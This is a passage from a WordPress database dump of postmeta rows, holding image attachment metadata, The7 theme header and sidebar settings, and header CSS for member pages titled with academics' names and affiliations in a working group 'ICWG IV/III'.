(10705,2706,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2400;s:6:\"height\";i:599;s:4:\"file\";s:7:\"w91.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"w91-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1124;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:14:\"w91-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2763;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:15:\"w91-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8754;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:16:\"w91-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13652;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:16:\"w91-1536x383.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26102;}s:14:\"2048x2048-orig\";a:5:{s:4:\"file\";s:16:\"w91-2048x511.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42453;}s:18:\"full-1665756338439\";a:3:{s:5:\"width\";i:582;s:6:\"height\";i:600;s:4:\"file\";s:22:\"w91-e1665290087731.jpg\";}s:23:\"thumbnail-1665756338439\";a:5:{s:4:\"file\";s:30:\"w91-e1665290087731-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5062;}s:20:\"medium-1665756338439\";a:5:{s:4:\"file\";s:30:\"w91-e1665290087731-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13635;}}'),
(10706,2705,'_thumbnail_id','2706'),
(10707,2705,'_edit_last','1'),
(10708,2705,'_dt_sidebar_position','disabled'),
(10709,2705,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10710,2705,'_dt_sidebar_hide_on_mobile','0'),
(10711,2705,'_dt_footer_show','1'),
(10712,2705,'_dt_footer_widgetarea_id','sidebar_2'),
(10713,2705,'_dt_footer_hide_on_mobile','0'),
(10714,2705,'_dt_header_title','fancy'),
(10715,2705,'_dt_header_background','normal'),
(10716,2705,'_dt_header_background_below_slideshow','disabled'),
(10717,2705,'_dt_header_transparent_bg_color_scheme','light'),
(10718,2705,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10719,2705,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10720,2705,'_dt_header_transparent_bg_color','#000000'),
(10721,2705,'_dt_header_transparent_bg_opacity','50'),
(10722,2705,'_dt_header_disabled_background','normal'),
(10723,2705,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10724,2705,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10725,2705,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10726,2705,'_dt_header_disabled_transparent_bg_color','#000000'),
(10727,2705,'_dt_header_disabled_transparent_bg_opacity','50'),
(10728,2705,'_dt_page_overrides_top_margin',''),
(10729,2705,'_dt_page_overrides_right_margin',''),
(10730,2705,'_dt_page_overrides_bottom_margin',''),
(10731,2705,'_dt_page_overrides_left_margin',''),
(10732,2705,'_dt_mobile_page_padding_top',''),
(10733,2705,'_dt_mobile_page_padding_right',''),
(10734,2705,'_dt_mobile_page_padding_bottom',''),
(10735,2705,'_dt_mobile_page_padding_left',''),
(10736,2705,'_dt_fancy_header_layout_heading',''),
(10737,2705,'_dt_fancy_header_title_aligment','center'),
(10738,2705,'_dt_fancy_header_height','300'),
(10739,2705,'_dt_fancy_header_padding-top','0px'),
(10740,2705,'_dt_fancy_header_padding-bottom','0px'),
(10741,2705,'_dt_fancy_header_breadcrumbs_heading',''),
(10742,2705,'_dt_fancy_header_breadcrumbs','disabled'),
(10743,2705,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10744,2705,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10745,2705,'_dt_fancy_header_title_heading',''),
(10746,2705,'_dt_fancy_header_title_mode','custom'),
(10747,2705,'_dt_fancy_header_title','Hongchao Fan Norwegian University of Science and Technology, Norway (ICWG IV/III)'),
(10748,2705,'_dt_fancy_header_title_font_size','30'),
(10749,2705,'_dt_fancy_header_title_line_height','36'),
(10750,2705,'_dt_fancy_header_text_transform','none'),
(10751,2705,'_dt_fancy_header_title_color_mode','color'),
(10752,2705,'_dt_fancy_header_title_color','#ffffff'),
(10753,2705,'_dt_fancy_header_subtitle_heading',''),
(10754,2705,'_dt_fancy_header_subtitle',''),
(10755,2705,'_dt_fancy_header_subtitle_font_size','18'),
(10756,2705,'_dt_fancy_header_subtitle_line_height','26'),
(10757,2705,'_dt_fancy_header_subtitle_text_transform','none'),
(10758,2705,'_dt_fancy_header_subtitle_color_mode','color'),
(10759,2705,'_dt_fancy_header_subtitle_color','#ffffff'),
(10760,2705,'_dt_fancy_header_bg_heading',''),
(10761,2705,'_dt_fancy_header_bg_color','#222222'),
(10762,2705,'_dt_fancy_header_bg_image_origin','custom'),
(10763,2705,'_dt_fancy_header_bg_image','a:0:{}'),
(10764,2705,'_dt_fancy_header_bg_repeat','no-repeat'),
(10765,2705,'_dt_fancy_header_bg_position_x','center'),
(10766,2705,'_dt_fancy_header_bg_position_y','center'),
(10767,2705,'_dt_fancy_header_bg_fullscreen','1'),
(10768,2705,'_dt_fancy_header_bg_overlay','0'),
(10769,2705,'_dt_fancy_header_overlay_color','#000'),
(10770,2705,'_dt_fancy_header_bg_overlay_opacity','50'),
(10771,2705,'_dt_fancy_header_scroll_effect','default'),
(10772,2705,'_dt_fancy_header_bg_parallax','0.5'),
(10773,2705,'_dt_fancy_header_responsiveness_heading',''),
(10774,2705,'_dt_fancy_header_responsiveness','enabled'),
(10775,2705,'_dt_fancy_header_responsiveness_switch','778px'),
(10776,2705,'_dt_fancy_header_responsive_height','70'),
(10777,2705,'_dt_fancy_header_responsive_font_size','30'),
(10778,2705,'_dt_fancy_header_responsive_title_line_height','38'),
(10779,2705,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10780,2705,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10781,2705,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10782,2705,'_dt_teammate_options_go_to_single','1'),
(10783,2705,'_dt_teammate_options_position',''),
(10784,2705,'_dt_teammate_options_website',''),
(10785,2705,'_dt_teammate_options_mail',''),
(10786,2705,'_dt_teammate_options_facebook',''),
(10787,2705,'_dt_teammate_options_twitter',''),
(10788,2705,'_dt_teammate_options_dribbble',''),
(10789,2705,'_dt_teammate_options_you-tube',''),
(10790,2705,'_dt_teammate_options_rss',''),
(10791,2705,'_dt_teammate_options_delicious',''),
(10792,2705,'_dt_teammate_options_flickr',''),
(10793,2705,'_dt_teammate_options_lastfm',''),
(10794,2705,'_dt_teammate_options_linkedin',''),
(10795,2705,'_dt_teammate_options_vimeo',''),
(10796,2705,'_dt_teammate_options_tumbler',''),
(10797,2705,'_dt_teammate_options_pinterest',''),
(10798,2705,'_dt_teammate_options_devian',''),
(10799,2705,'_dt_teammate_options_skype',''),
(10800,2705,'_dt_teammate_options_github',''),
(10801,2705,'_dt_teammate_options_instagram',''),
(10802,2705,'_dt_teammate_options_stumbleupon',''),
(10803,2705,'_dt_teammate_options_behance',''),
(10804,2705,'_dt_teammate_options_px-500',''),
(10805,2705,'_dt_teammate_options_tripedvisor',''),
(10806,2705,'_dt_teammate_options_vk',''),
(10807,2705,'_dt_teammate_options_foursquare',''),
(10808,2705,'_dt_teammate_options_xing',''),
(10809,2705,'_dt_teammate_options_weibo',''),
(10810,2705,'_dt_teammate_options_odnoklassniki',''),
(10811,2705,'_dt_teammate_options_research-gate',''),
(10812,2705,'_dt_teammate_options_yelp',''),
(10813,2705,'_dt_teammate_options_blogger',''),
(10814,2705,'_dt_teammate_options_soundcloud',''),
(10815,2705,'_dt_teammate_options_viber',''),
(10816,2705,'_dt_teammate_options_whatsapp',''),
(10817,2705,'_dt_teammate_options_reddit',''),
(10818,2705,'_dt_teammate_options_snapchat',''),
(10819,2705,'_dt_teammate_options_telegram',''),
(10820,2705,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10821,2707,'_edit_lock','1665756353:1'),
(10822,2708,'_wp_attached_file','2022/10/w92-e1665756307373.jpg'),
(10823,2708,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:206;s:4:\"file\";s:30:\"2022/10/w92-e1665756307373.jpg\";s:8:\"filesize\";i:59609;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"w92-e1665290212550-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15559;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"w92-1024x175.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9384;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"w92-e1665756307373-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5539;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"w92-768x132.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6535;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"w92-1536x263.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17903;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:16:\"w92-2048x351.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28243;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10824,2708,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2400;s:6:\"height\";i:411;s:4:\"file\";s:7:\"w92.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"w92-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1090;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:14:\"w92-300x51.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:51;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1980;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:15:\"w92-768x132.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6535;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:16:\"w92-1024x175.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9384;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:16:\"w92-1536x263.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17903;}s:14:\"2048x2048-orig\";a:5:{s:4:\"file\";s:16:\"w92-2048x351.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28243;}s:18:\"full-1665756307373\";a:3:{s:5:\"width\";i:402;s:6:\"height\";i:414;s:4:\"file\";s:22:\"w92-e1665290212550.jpg\";}s:23:\"thumbnail-1665756307373\";a:5:{s:4:\"file\";s:30:\"w92-e1665290212550-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5791;}s:20:\"medium-1665756307373\";a:5:{s:4:\"file\";s:30:\"w92-e1665290212550-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15559;}}'),
(10825,2707,'_thumbnail_id','2708'),
(10826,2707,'_edit_last','1'),
(10827,2707,'_dt_sidebar_position','disabled'),
(10828,2707,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10829,2707,'_dt_sidebar_hide_on_mobile','0'),
(10830,2707,'_dt_footer_show','1'),
(10831,2707,'_dt_footer_widgetarea_id','sidebar_2'),
(10832,2707,'_dt_footer_hide_on_mobile','0'),
(10833,2707,'_dt_header_title','fancy'),
(10834,2707,'_dt_header_background','normal'),
(10835,2707,'_dt_header_background_below_slideshow','disabled'),
(10836,2707,'_dt_header_transparent_bg_color_scheme','light'),
(10837,2707,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10838,2707,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10839,2707,'_dt_header_transparent_bg_color','#000000'),
(10840,2707,'_dt_header_transparent_bg_opacity','50'),
(10841,2707,'_dt_header_disabled_background','normal'),
(10842,2707,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10843,2707,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10844,2707,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10845,2707,'_dt_header_disabled_transparent_bg_color','#000000'),
(10846,2707,'_dt_header_disabled_transparent_bg_opacity','50'),
(10847,2707,'_dt_page_overrides_top_margin',''),
(10848,2707,'_dt_page_overrides_right_margin',''),
(10849,2707,'_dt_page_overrides_bottom_margin',''),
(10850,2707,'_dt_page_overrides_left_margin',''),
(10851,2707,'_dt_mobile_page_padding_top',''),
(10852,2707,'_dt_mobile_page_padding_right',''),
(10853,2707,'_dt_mobile_page_padding_bottom',''),
(10854,2707,'_dt_mobile_page_padding_left',''),
(10855,2707,'_dt_fancy_header_layout_heading',''),
(10856,2707,'_dt_fancy_header_title_aligment','center'),
(10857,2707,'_dt_fancy_header_height','300'),
(10858,2707,'_dt_fancy_header_padding-top','0px'),
(10859,2707,'_dt_fancy_header_padding-bottom','0px'),
(10860,2707,'_dt_fancy_header_breadcrumbs_heading',''),
(10861,2707,'_dt_fancy_header_breadcrumbs','disabled'),
(10862,2707,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10863,2707,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10864,2707,'_dt_fancy_header_title_heading',''),
(10865,2707,'_dt_fancy_header_title_mode','custom'),
(10866,2707,'_dt_fancy_header_title','Lucy W. Mburu  College of Technology  KCA University,  Kenya  (ICWG IV/III)'),
(10867,2707,'_dt_fancy_header_title_font_size','30'),
(10868,2707,'_dt_fancy_header_title_line_height','36'),
(10869,2707,'_dt_fancy_header_text_transform','none'),
(10870,2707,'_dt_fancy_header_title_color_mode','color'),
(10871,2707,'_dt_fancy_header_title_color','#ffffff'),
(10872,2707,'_dt_fancy_header_subtitle_heading',''),
(10873,2707,'_dt_fancy_header_subtitle',''),
(10874,2707,'_dt_fancy_header_subtitle_font_size','18'),
(10875,2707,'_dt_fancy_header_subtitle_line_height','26'),
(10876,2707,'_dt_fancy_header_subtitle_text_transform','none'),
(10877,2707,'_dt_fancy_header_subtitle_color_mode','color'),
(10878,2707,'_dt_fancy_header_subtitle_color','#ffffff'),
(10879,2707,'_dt_fancy_header_bg_heading',''),
(10880,2707,'_dt_fancy_header_bg_color','#222222'),
(10881,2707,'_dt_fancy_header_bg_image_origin','custom'),
(10882,2707,'_dt_fancy_header_bg_image','a:0:{}'),
(10883,2707,'_dt_fancy_header_bg_repeat','no-repeat'),
(10884,2707,'_dt_fancy_header_bg_position_x','center'),
(10885,2707,'_dt_fancy_header_bg_position_y','center'),
(10886,2707,'_dt_fancy_header_bg_fullscreen','1'),
(10887,2707,'_dt_fancy_header_bg_overlay','0'),
(10888,2707,'_dt_fancy_header_overlay_color','#000'),
(10889,2707,'_dt_fancy_header_bg_overlay_opacity','50'),
(10890,2707,'_dt_fancy_header_scroll_effect','default'),
(10891,2707,'_dt_fancy_header_bg_parallax','0.5'),
(10892,2707,'_dt_fancy_header_responsiveness_heading',''),
(10893,2707,'_dt_fancy_header_responsiveness','enabled'),
(10894,2707,'_dt_fancy_header_responsiveness_switch','778px'),
(10895,2707,'_dt_fancy_header_responsive_height','70'),
(10896,2707,'_dt_fancy_header_responsive_font_size','30'),
(10897,2707,'_dt_fancy_header_responsive_title_line_height','38'),
(10898,2707,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10899,2707,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10900,2707,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10901,2707,'_dt_teammate_options_go_to_single','1'),
(10902,2707,'_dt_teammate_options_position',''),
(10903,2707,'_dt_teammate_options_website',''),
(10904,2707,'_dt_teammate_options_mail',''),
(10905,2707,'_dt_teammate_options_facebook',''),
(10906,2707,'_dt_teammate_options_twitter',''),
(10907,2707,'_dt_teammate_options_dribbble',''),
(10908,2707,'_dt_teammate_options_you-tube',''),
(10909,2707,'_dt_teammate_options_rss',''),
(10910,2707,'_dt_teammate_options_delicious',''),
(10911,2707,'_dt_teammate_options_flickr',''),
(10912,2707,'_dt_teammate_options_lastfm',''),
(10913,2707,'_dt_teammate_options_linkedin',''),
(10914,2707,'_dt_teammate_options_vimeo',''),
(10915,2707,'_dt_teammate_options_tumbler',''),
(10916,2707,'_dt_teammate_options_pinterest',''),
(10917,2707,'_dt_teammate_options_devian',''),
(10918,2707,'_dt_teammate_options_skype',''),
(10919,2707,'_dt_teammate_options_github',''),
(10920,2707,'_dt_teammate_options_instagram',''),
(10921,2707,'_dt_teammate_options_stumbleupon',''),
(10922,2707,'_dt_teammate_options_behance',''),
(10923,2707,'_dt_teammate_options_px-500',''),
(10924,2707,'_dt_teammate_options_tripedvisor',''),
(10925,2707,'_dt_teammate_options_vk',''),
(10926,2707,'_dt_teammate_options_foursquare',''),
(10927,2707,'_dt_teammate_options_xing',''),
(10928,2707,'_dt_teammate_options_weibo',''),
(10929,2707,'_dt_teammate_options_odnoklassniki',''),
(10930,2707,'_dt_teammate_options_research-gate',''),
(10931,2707,'_dt_teammate_options_yelp',''),
(10932,2707,'_dt_teammate_options_blogger',''),
(10933,2707,'_dt_teammate_options_soundcloud',''),
(10934,2707,'_dt_teammate_options_viber',''),
(10935,2707,'_dt_teammate_options_whatsapp',''),
(10936,2707,'_dt_teammate_options_reddit',''),
(10937,2707,'_dt_teammate_options_snapchat',''),
(10938,2707,'_dt_teammate_options_telegram',''),
(10939,2707,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10940,2709,'_edit_lock','1665756330:1'),
(10941,2710,'_wp_attached_file','2022/10/w93-e1665756284941.jpg'),
(10942,2710,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:207;s:4:\"file\";s:30:\"2022/10/w93-e1665756284941.jpg\";s:8:\"filesize\";i:41188;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"w93-e1665290316449-289x300.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11758;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"w93-1024x146.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:146;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"w93-e1665756284941-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4337;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"w93-768x110.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4280;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"w93-1536x220.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12505;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:16:\"w93-2048x293.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20332;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10943,2710,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2400;s:6:\"height\";i:343;s:4:\"file\";s:7:\"w93.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"w93-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1089;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:14:\"w93-300x43.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:43;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1504;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:15:\"w93-768x110.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4280;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:16:\"w93-1024x146.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:146;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6848;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:16:\"w93-1536x220.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12505;}s:14:\"2048x2048-orig\";a:5:{s:4:\"file\";s:16:\"w93-2048x293.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20332;}s:18:\"full-1665756284941\";a:3:{s:5:\"width\";i:330;s:6:\"height\";i:342;s:4:\"file\";s:22:\"w93-e1665290316449.jpg\";}s:23:\"thumbnail-1665756284941\";a:5:{s:4:\"file\";s:30:\"w93-e1665290316449-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4480;}s:20:\"medium-1665756284941\";a:5:{s:4:\"file\";s:30:\"w93-e1665290316449-289x300.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11758;}}'),
(10944,2709,'_thumbnail_id','2710'),
(10945,2709,'_edit_last','1'),
(10946,2709,'_dt_sidebar_position','disabled'),
(10947,2709,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10948,2709,'_dt_sidebar_hide_on_mobile','0'),
(10949,2709,'_dt_footer_show','1'),
(10950,2709,'_dt_footer_widgetarea_id','sidebar_2'),
(10951,2709,'_dt_footer_hide_on_mobile','0'),
(10952,2709,'_dt_header_title','fancy'),
(10953,2709,'_dt_header_background','normal'),
(10954,2709,'_dt_header_background_below_slideshow','disabled'),
(10955,2709,'_dt_header_transparent_bg_color_scheme','light'),
(10956,2709,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10957,2709,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10958,2709,'_dt_header_transparent_bg_color','#000000'),
(10959,2709,'_dt_header_transparent_bg_opacity','50'),
(10960,2709,'_dt_header_disabled_background','normal'),
(10961,2709,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10962,2709,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10963,2709,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10964,2709,'_dt_header_disabled_transparent_bg_color','#000000'),
(10965,2709,'_dt_header_disabled_transparent_bg_opacity','50'),
(10966,2709,'_dt_page_overrides_top_margin',''),
(10967,2709,'_dt_page_overrides_right_margin',''),
(10968,2709,'_dt_page_overrides_bottom_margin',''),
(10969,2709,'_dt_page_overrides_left_margin',''),
(10970,2709,'_dt_mobile_page_padding_top',''),
(10971,2709,'_dt_mobile_page_padding_right',''),
(10972,2709,'_dt_mobile_page_padding_bottom',''),
(10973,2709,'_dt_mobile_page_padding_left',''),
